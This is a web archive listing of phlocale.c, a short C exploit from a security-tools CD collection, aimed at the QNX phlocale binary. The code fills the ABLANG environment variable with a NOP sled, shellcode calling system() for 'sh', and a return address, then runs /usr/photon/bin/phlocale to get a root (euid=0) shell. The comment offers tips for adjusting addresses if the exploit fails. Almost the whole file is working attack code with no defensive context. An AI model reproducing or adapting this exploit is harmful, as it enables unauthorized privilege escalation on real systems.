home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / qnx / local / phlocale.c < prev    next >
Text File  |  2005-02-12  |  609b  |  23 lines
  1. /* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell. 
  2.  * If it doesnt work for you, then you most likely need to change
  3.  * the address to system() and/or the ret.
  4.  * 
  5.  * www.badc0ded.com 
  6. */
  7.  
  8. main ()
  10.    char s[]="\xeb\x0e\x31\xc0\x5b"
  11.             "\x88\x43\x2\x53\xbb"
  12.             "\x80\x95\x04\x08"       //system() address
  13.             "\xff\xd3\xe8\xed\xff"
  14.             "\xff\xff\x73\x68";
  15.    char payload[1000];
  16.    memset (payload,0x90,sizeof(payload));
  17.    sprintf(payload+971,"%s%s",s,"\x78\x7b\x04\x08");
  18.    setenv("ABLANG",payload);
  19.    execlp("/usr/photon/bin/phlocale","phlocale",0);
  20. }
  21.  
  22.  
  23.